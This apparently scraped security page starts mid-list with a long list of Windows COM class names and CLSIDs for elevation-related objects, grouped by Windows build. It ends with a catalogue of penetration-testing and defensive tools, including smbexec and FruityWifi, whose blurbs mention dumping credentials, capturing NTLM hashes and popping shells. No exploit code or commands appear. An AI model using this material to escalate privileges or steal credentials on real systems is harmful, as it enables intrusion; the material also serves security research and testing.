CIEInetcplRasBroker {d63c23c5-53e6-48d5-adda-a385b6bb9c7b} Bluewire Elevated Unpairing Handler {D88EC52B-8D57-49e1-9EB3-4D267D68A2AE} Advanced Configuration Dialog {DCED8DB0-11A5-4b16-AB9D-4E28CA38C99F} Microsoft.VisualStudio.ProductKeyDialog.ElevatedLicensingState {DED3CB50-510E-469B-A362-AB3581D83A2F} SDChangeObj Class {E1BA41AD-4A1D-418F-AABA-3D1196B423D3} HNetCfg.FwPolicy2 {E2B3C97F-6AE1-41AC-817A-F6F92166D7DD} Security Center {E9495B87-D950-4ab5-87A5-FF6D70BF3E90} User Account Control Settings {EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8} HNetCfg.FwAuthorizedApplication {EC9846B3-2762-4A6B-A214-6ACB603462D2} PerfCenter Enabler {f4be747e-45c4-4701-90f1-d49d9ac30248} Internet Shortcut {FBF23B40-E3F0-101B-8488-00AA003E56F8} ARP UninstallString Launcher {FCC74B77-EC3E-4dd8-A80B-008A702075A9} Elevatable Shortcut {ff9e6131-a8c1-4188-aa03-82e9f10a05a8} HomeGroup CPL Advanced Settings Writer {ffe1df5f-9f06-46d3-af27-f1fc10d63892} Windows 8.1 x64 9600 CEIPLuaElevationHelper {01D0A625-782D-4777-8D4E-547E6457FAD5} {08d450b7-f7e5-4424-8229-11888adb7c14} RasDlg LUA {0C3B05FB-3498-40C3-9C03-4B22D735550C} HNetCfg.FwOpenPort {0CA545C6-37AD-4A6C-BF92-9F7610067EF5} ARP CBS Uninstaller Proxy {0da7bfdf-c0a0-44eb-be82-b7a82c4721de} WUAppElevator class {1138506a-b949-46a7-b6c0-ee26499fdeaf} VistaWUWebControl Class {12a66224-5e8a-4679-8941-0b9b960bf5ea} Virtual Factory for DiagCpl {12C21EA7-2EB8-4B55-9249-AC243DA8C666} TPM Virtual Smart Card Manager {16A18E86-7F6E-4C20-AD89-4FFC0DB7A96A} SPPLUAObject Class {179CC917-3A82-40E7-9F8C-2FC8A3D2212B} Share Media Settings Writer {19BA17F2-2602-4E77-9027-103894607626} Create New Link {1BA783C1-2A30-4ad3-B928-A9A46C604C28} Lpksetup LUA Elevation {1C749B87-568C-4865-8E73-6413F8372CE6} Shell Indexer Admin Object {1E1714A3-50B9-480b-A94A-636D9A9B56D1} Security Shell Extension {1f2e5c40-9550-11ce-99d2-00aa006e086c} Microsoft Disk Quota UI Elevation Helper {1fb2a002-4c6c-4de7-85c2-cb8db9a4f728} Detection And Sharing {1fda955b-61ff-11da-978c-0008744faab7} WUPublishedAppInstallorElevator Class {26D32566-760A-40A2-AA82-A40366528916} FaultrepElevatedDataCollection {2C256447-3F0D-4CBB-9D12-575BB20CDA0A} HNetCfg.FwRule {2C5BC43E-3369-4C33-AB0C-BE9469677AF4} Advanced Indexing Options Dialog Object {2F2165FF-2C2D-4612-87B2-CC8E5002EF4C} HNetCfg.FwMgr {304CE942-6E39-40D8-943A-B913C40C9CD4} CtTuner Class {32BA16FD-77D9-4AFB-9C9F-703E92AD4BFF} Copy/Move/Rename/Delete/Link Object {3ad05575-8857-4850-9277-11b85bdb8e09} CMLUAUTIL {3E000D72-A845-4CD9-BD83-80C07C3B881F} CMSTPLUA {3E5FC7F9-9A51-4367-9063-A120244FBEC7} AccesibilityCplAdmin Class {434A6274-C539-4E99-88FC-44206D942775} Home Networking Configuration Manager {46C166AA-3108-11D4-9348-00C04F8EEB71} CIEContentAdvisorBroker {46CB32FA-B5CA-8A3A-62CA-A7023C0496C5} Virtual Factory for Languages Configuration {4A3F2F56-454A-4CC5-9734-BB7D8141AC0A} RasGcw LUA {4A6B8BAD-9872-4525-A812-71A52367DC17} CIERegistryHKLMBroker {4b360c3c-d284-4384-abcc-ef133e1445da} ERCLuaElevationHelper {4BC67F23-D805-4384-BCA3-6F1EDFF50E2C} Shell Security Editor {4D111E08-CBF7-4f12-A926-2C7920AF52FC} AddMdmObj Class {4DF929E7-4C5E-4587-A598-7ED7B3D6E462} LayerUIPropPage {513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8} Region and Language UAC Elevation {514B5E31-5596-422F-BE58-D804464683B5} Shell Disc Image Mount {51a1467f-96a2-4b1c-9632-4b4d950fe216} FaxCommon Class {59347292-B72D-41F2-98C5-E9ACA1B247A2} IE Spelling Dictionary Installer Broker {5bbd58bb-993e-4c17-8af6-3af8e908fca8} Developer License Launcher {5C917E9C-0B2F-40D6-928B-5C43FDB16DF4} Mount Point Rename {60173D16-A550-47f0-A14B-C6F9E4DA0831} NAP Elevated class {677126ed-2a91-40ff-8c52-06181c064573} PortableWorkspaceLauncher Class {698F7D05-37F0-4902-8A63-AEF7D44DC7FC} Sensors CPL Change Device Permission LUA Helper {6CE51F75-0448-438e-B9CA-69C352A248A7} Advanced Indexing Options Dialog Object {6D3951EB-0B07-4fb8-B703-7C5CEE0DB578} LAN Connection UI Class {7007ACC5-3202-11D1-AAD2-00805FC1270E} Network Common Connections Ui {7007ACD1-3202-11D1-AAD2-00805FC1270E} Sharing Elevated Virtual Factory {72A7994A-3092-4054-B6BE-08FF81AEEFFC} FwCpl LUA {752438CB-E941-433F-BCB4-8B7D2329F0C8} XWizard Task Stub {777BA815-2498-4875-933A-3067DE883070} XWizard Page Stub {777BA816-2498-4875-933A-3067DE883070} XWizard Virtual Factory {777BA81A-2498-4875-933A-3067DE883070} Private XWizard Registration Manager Class {777BA8F5-2498-4875-933A-3067DE883070} Private XWizard Factory Registration Manager Class {777BA8F9-2498-4875-933A-3067DE883070} Private XWizard Type Registration Manager Class {777BA8FB-2498-4875-933A-3067DE883070} Network and Sharing Center Cpl Elevated Virtual Factory {7A076CE1-4B31-452a-A4F1-0304C8738100} Shell FMIFS Wrapper {7aa7790d-75d7-484b-98a1-3913d022091d} HomeGroup Password {7be73787-ce71-4b33-b4c8-00d32b54bea8} HomeGroup Printing Device Class {7DF8EF76-D449-485f-B4EB-58DC96B31EDB} Virtual Factory for Usercpl {86d5eb8a-859f-4c7b-a76b-2bd819b7a850} CElevateWlanUi {86F80216-5DD6-4F43-953B-35EF40A35AEE} Virtual Factory for Recovery {9200689A-F979-4eea-8830-0E1D6B74821F} Date and Time Properties {9df523b0-a6c0-4ea9-b5f1-f4565c3ac8b8} {A0ADD4EC-5BD3-4f70-A47B-07797A45C635} WlanPref LUA {A25821B5-F310-41BD-806F-5864CC441B78} Microsoft Windows Defender {A2D75874-6750-4931-94C1-C99D3BC9D0C7} Windows Parental Controls {A2D8CFE7-7BA4-4bad-B86B-851376B59134} Virtual Factory for Windows Firewall Cpl {A4B07E49-6567-4FB8-8D39-01920E3B2357} Shell ChkdskEx Dialog {a4c31131-ff70-4984-afd6-0609ced53ad6} CLSID_ResetEASPolicies {A5EAE54D-9886-4B8D-AA78-EAFF38D011CA} Virtual Factory for MaintenanceUI {A6BFEA43-501F-456F-A845-983D3AD7B8F0} Secure Startup {A7A63E5C-3877-4840-8727-C1EA9D7A4D50} RemMdmObj Class {A9710FB5-1840-4224-BD42-86831E28E43A} Connection Manager LUA Host Object {BA126F01-2166-11D1-B1D0-00805FC1270E} WlanAdhoc LUA {BB2D41DF-7E34-4F06-8F51-007C9CAD36BE} Virtual Factory for Power Options Control Panel {BBD8C065-5E6C-4e88-BFD7-BE3E6D1C063B} DfsShellAdmin Class {BCEA735B-4DAC-4B71-9C47-1D560AFD2A9B} Network Center LUA {C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB} WCN Elevation Helper {C100BEBB-D33A-4a4b-BF23-BBEF4663D017} Network Diagnostics Framework {C529C7EF-A3AF-45F2-8A47-767B33AA5CC0} FsrmPropertiesPropSheet Class {C88A4279-5ADC-4465-927F-6B19777AA5F9} PNPX Association Class {cee8ccc9-4f6b-4469-a235-5a22869eef03} CIEInetcplRasBroker {d63c23c5-53e6-48d5-adda-a385b6bb9c7b} Advanced Configuration Dialog {DCED8DB0-11A5-4b16-AB9D-4E28CA38C99F} SDChangeObj Class {E1BA41AD-4A1D-418F-AABA-3D1196B423D3} HNetCfg.FwPolicy2 {E2B3C97F-6AE1-41AC-817A-F6F92166D7DD} Set Network Location Class Factory {E5A040E9-1097-4D24-B89E-3C730036D615} Security Center {E9495B87-D950-4ab5-87A5-FF6D70BF3E90} Remove Device Elevated Handler {E95186C7-7D80-4311-843D-0702CBC8B1E4} User Account Control Settings {EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8} HNetCfg.FwAuthorizedApplication {EC9846B3-2762-4A6B-A214-6ACB603462D2} PerfCenter Enabler {f4be747e-45c4-4701-90f1-d49d9ac30248} Internet Shortcut {FBF23B40-E3F0-101B-8488-00AA003E56F8} ARP UninstallString Launcher {FCC74B77-EC3E-4dd8-A80B-008A702075A9} Elevatable Shortcut {ff9e6131-a8c1-4188-aa03-82e9f10a05a8} HomeGroup CPL Advanced Settings Writer {ffe1df5f-9f06-46d3-af27-f1fc10d63892} Windows 10 TP x64 9901 CEIPLuaElevationHelper {01D0A625-782D-4777-8D4E-547E6457FAD5} {08d450b7-f7e5-4424-8229-11888adb7c14} RasDlg LUA {0C3B05FB-3498-40C3-9C03-4B22D735550C} HNetCfg.FwOpenPort {0CA545C6-37AD-4A6C-BF92-9F7610067EF5} ARP CBS Uninstaller Proxy {0da7bfdf-c0a0-44eb-be82-b7a82c4721de} WUAppElevator class {1138506a-b949-46a7-b6c0-ee26499fdeaf} VistaWUWebControl Class {12a66224-5e8a-4679-8941-0b9b960bf5ea} Virtual Factory for DiagCpl {12C21EA7-2EB8-4B55-9249-AC243DA8C666} TPM Virtual Smart Card Manager {16A18E86-7F6E-4C20-AD89-4FFC0DB7A96A} SPPLUAObject Class {179CC917-3A82-40E7-9F8C-2FC8A3D2212B} Share Media Settings Writer {19BA17F2-2602-4E77-9027-103894607626} Create New Link {1BA783C1-2A30-4ad3-B928-A9A46C604C28} Lpksetup LUA Elevation {1C749B87-568C-4865-8E73-6413F8372CE6} Shell Indexer Admin Object {1E1714A3-50B9-480b-A94A-636D9A9B56D1} Security Shell Extension {1f2e5c40-9550-11ce-99d2-00aa006e086c} Microsoft Disk Quota UI Elevation Helper {1fb2a002-4c6c-4de7-85c2-cb8db9a4f728} Detection And Sharing {1FDA955B-61FF-11DA-978C-0008744FAAB7} WUPublishedAppInstallorElevator Class {26D32566-760A-40A2-AA82-A40366528916} FaultrepElevatedDataCollection {2C256447-3F0D-4CBB-9D12-575BB20CDA0A} HNetCfg.FwRule {2C5BC43E-3369-4C33-AB0C-BE9469677AF4} Advanced Indexing Options Dialog Object {2F2165FF-2C2D-4612-87B2-CC8E5002EF4C} HNetCfg.FwMgr {304CE942-6E39-40D8-943A-B913C40C9CD4} CtTuner Class {32BA16FD-77D9-4AFB-9C9F-703E92AD4BFF} Copy/Move/Rename/Delete/Link Object {3ad05575-8857-4850-9277-11b85bdb8e09} CMLUAUTIL {3E000D72-A845-4CD9-BD83-80C07C3B881F} CMSTPLUA {3E5FC7F9-9A51-4367-9063-A120244FBEC7} AccesibilityCplAdmin Class {434A6274-C539-4E99-88FC-44206D942775} Home Networking Configuration Manager {46C166AA-3108-11D4-9348-00C04F8EEB71} CIEContentAdvisorBroker {46CB32FA-B5CA-8A3A-62CA-A7023C0496C5} Virtual Factory for Languages Configuration {4A3F2F56-454A-4CC5-9734-BB7D8141AC0A} RasGcw LUA {4A6B8BAD-9872-4525-A812-71A52367DC17} CIERegistryHKLMBroker {4b360c3c-d284-4384-abcc-ef133e1445da} ERCLuaElevationHelper {4BC67F23-D805-4384-BCA3-6F1EDFF50E2C} Shell Security Editor {4D111E08-CBF7-4f12-A926-2C7920AF52FC} AddMdmObj Class {4DF929E7-4C5E-4587-A598-7ED7B3D6E462} LayerUIPropPage {513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8} Region and Language UAC Elevation {514B5E31-5596-422F-BE58-D804464683B5} Shell Disc Image Mount {51a1467f-96a2-4b1c-9632-4b4d950fe216} FaxCommon Class {59347292-B72D-41F2-98C5-E9ACA1B247A2} IE Spelling Dictionary Installer Broker {5bbd58bb-993e-4c17-8af6-3af8e908fca8} Developer License Launcher {5C917E9C-0B2F-40D6-928B-5C43FDB16DF4} Mount Point Rename {60173D16-A550-47f0-A14B-C6F9E4DA0831} PortableWorkspaceLauncher Class {698F7D05-37F0-4902-8A63-AEF7D44DC7FC} Advanced Indexing Options Dialog Object {6D3951EB-0B07-4fb8-B703-7C5CEE0DB578} LAN Connection UI Class {7007ACC5-3202-11D1-AAD2-00805FC1270E} Network Common Connections Ui {7007ACD1-3202-11D1-AAD2-00805FC1270E} Sharing Elevated Virtual Factory {72A7994A-3092-4054-B6BE-08FF81AEEFFC} FwCpl LUA {752438CB-E941-433F-BCB4-8B7D2329F0C8} XWizard Task Stub {777BA815-2498-4875-933A-3067DE883070} XWizard Page Stub {777BA816-2498-4875-933A-3067DE883070} XWizard Virtual Factory {777BA81A-2498-4875-933A-3067DE883070} Private XWizard Registration Manager Class {777BA8F5-2498-4875-933A-3067DE883070} Private XWizard Factory Registration Manager Class {777BA8F9-2498-4875-933A-3067DE883070} Private XWizard Type Registration Manager Class {777BA8FB-2498-4875-933A-3067DE883070} Network and Sharing Center Cpl Elevated Virtual Factory {7A076CE1-4B31-452a-A4F1-0304C8738100} Shell FMIFS Wrapper {7aa7790d-75d7-484b-98a1-3913d022091d} HomeGroup Password {7be73787-ce71-4b33-b4c8-00d32b54bea8} HomeGroup Printing Device Class {7DF8EF76-D449-485f-B4EB-58DC96B31EDB} Virtual Factory for Usercpl {86d5eb8a-859f-4c7b-a76b-2bd819b7a850} CElevateWlanUi {86F80216-5DD6-4F43-953B-35EF40A35AEE} Virtual Factory for Recovery {9200689A-F979-4eea-8830-0E1D6B74821F} Date and Time Properties {9df523b0-a6c0-4ea9-b5f1-f4565c3ac8b8} {A0ADD4EC-5BD3-4f70-A47B-07797A45C635} WlanPref LUA {A25821B5-F310-41BD-806F-5864CC441B78} Microsoft Windows Defender {A2D75874-6750-4931-94C1-C99D3BC9D0C7} Windows Parental Controls {A2D8CFE7-7BA4-4bad-B86B-851376B59134} Virtual Factory for Windows Firewall Cpl {A4B07E49-6567-4FB8-8D39-01920E3B2357} Shell ChkdskEx Dialog {a4c31131-ff70-4984-afd6-0609ced53ad6} CLSID_ResetEASPolicies {A5EAE54D-9886-4B8D-AA78-EAFF38D011CA} Virtual Factory for MaintenanceUI {A6BFEA43-501F-456F-A845-983D3AD7B8F0} Secure Startup {A7A63E5C-3877-4840-8727-C1EA9D7A4D50} RemMdmObj Class {A9710FB5-1840-4224-BD42-86831E28E43A} Connection Manager LUA Host Object {BA126F01-2166-11D1-B1D0-00805FC1270E} WlanAdhoc LUA {BB2D41DF-7E34-4F06-8F51-007C9CAD36BE} Virtual Factory for Power Options Control Panel {BBD8C065-5E6C-4e88-BFD7-BE3E6D1C063B} DfsShellAdmin Class {BCEA735B-4DAC-4B71-9C47-1D560AFD2A9B} Network Center LUA {C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB} WCN Elevation Helper {C100BEBB-D33A-4a4b-BF23-BBEF4663D017} Network Diagnostics Framework {C529C7EF-A3AF-45F2-8A47-767B33AA5CC0} FodHelperComObject Class {C6B167EA-DB3E-4659-BADC-D1CCC00EFE9C} FsrmPropertiesPropSheet Class {C88A4279-5ADC-4465-927F-6B19777AA5F9} PNPX Association Class {cee8ccc9-4f6b-4469-a235-5a22869eef03} CIEInetcplRasBroker {d63c23c5-53e6-48d5-adda-a385b6bb9c7b} Advanced Configuration Dialog {DCED8DB0-11A5-4b16-AB9D-4E28CA38C99F} SDChangeObj Class {E1BA41AD-4A1D-418F-AABA-3D1196B423D3} HNetCfg.FwPolicy2 {E2B3C97F-6AE1-41AC-817A-F6F92166D7DD} Set Network Location Class Factory {E5A040E9-1097-4D24-B89E-3C730036D615} Security Center {E9495B87-D950-4ab5-87A5-FF6D70BF3E90} Remove Device Elevated Handler {E95186C7-7D80-4311-843D-0702CBC8B1E4} User Account Control Settings {EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8} HNetCfg.FwAuthorizedApplication {EC9846B3-2762-4A6B-A214-6ACB603462D2} PerfCenter Enabler {f4be747e-45c4-4701-90f1-d49d9ac30248} Internet Shortcut {FBF23B40-E3F0-101B-8488-00AA003E56F8} ARP UninstallString Launcher {FCC74B77-EC3E-4dd8-A80B-008A702075A9} Elevatable Shortcut {ff9e6131-a8c1-4188-aa03-82e9f10a05a8} HomeGroup CPL Advanced Settings Writer {ffe1df5f-9f06-46d3-af27-f1fc10d63892} Source

Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Download: https://github.com/tomac/yersinia

A rapid tool based on psexec style attack with samba tools. Key features Enumerate systems with domain admin logged in Grab hashes Extract cached creds (based on cachedump) Remote Login Validation Dump cleartext credentials Pop shells Includes smbexec.sh installer.sh patches to compile binaries source for samba-3.6.9 and winexe-1.00 Download: https://github.com/pentestgeek/smbexec

ebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with web application planning and exploitation. Suite currently contains a spectrum of efficient, fast and stable web tools (Crawler, Bruteforcer, Fuzzer, Proxy, Editor) and some extra functionality tools (Scripting Filters, List Generator, External Proxy). Download: Sunrise Technologies

FruityWifi is a wireless network auditing tool based in the Wifi Pineapple idea. The application can be installed in any Debian based system. Tested in Debian, Kali Linux, BugTraq, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi). With the new version, it is possible to install external modules. This functionality gives the user more flexibility and the FruityWifi can be customized. The modules can be added or removed anytime using the on-line repository. A new modules panel was added to the status page. All modules can be enabled/disabled from this panel. The new phishing option allows to enable/disable the feature from the status page. Responder.py module has been released and can be installed from the modules page. (HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server can be enabled to capture user, passwords and NTLM/LM hashes) Download: https://github.com/xtr4nge/FruityWifi

Dependency-Check is a utility that attempts to detect publicly disclosed vulnerabilities contained within project dependencies. It does this by determining if there is a Common Platform Enumeration (CPE) identifier for a given dependency. If found, it will generate a report linking to the associated CVE entries. Documentation and links to production binary releases can be found on the github pages. Additionally, more information about the architecture and ways to extend dependency-check can be found on the wiki. Download: https://github.com/jeremylong/DependencyCheck

GoLismero is an open source framework for security testing. It’s currently geared towards web security, but it can easily be expanded to other kinds of scans. Download: https://github.com/golismero/golismero

Damn Vulnerable iOS App (DVIA) is an iOS application that is damn vulnerable. Its main goal is to provide a platform to mobile security enthusiasts/professionals or students to test their iOS penetration testing skills in a legal environment. Download: Downloads - DVIA (Damn Vulnerable iOS App)

NINJA-PingU Is Not Just a Ping Utility is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration. Download: https://github.com/OWASP/NINJA-PingU

ModSecurity™is an open source, free web application firewall (WAF) Apache module. With over 70% of all attacks now carried out over the web application level, organizations need all the help they can get in making their systems secure. Download: ModSecurity: Download Code

iGoat is a learning tool for iOS developers (iPhone, iPad, etc.). It was inspired by the WebGoat project, and has a similar conceptual flow to it. As such, iGoat is a safe environment where iOS developers can learn about the major security pitfalls they face as well as how to avoid them. It is made up of a series of lessons that each teach a single (but vital) security lesson. iGoat is free software, released under the GPLv3 license. Download: https://code.google.com/p/owasp-igoat/wiki/NewDownloads

Cuckoo Sandbox is a malware analysis system. It simply means that you can throw any suspicious file at it and in a matter of seconds Cuckoo will provide you back some detailed results outlining what such file did when executed inside an isolated environment. Download: Automated Malware Analysis - Cuckoo Sandbox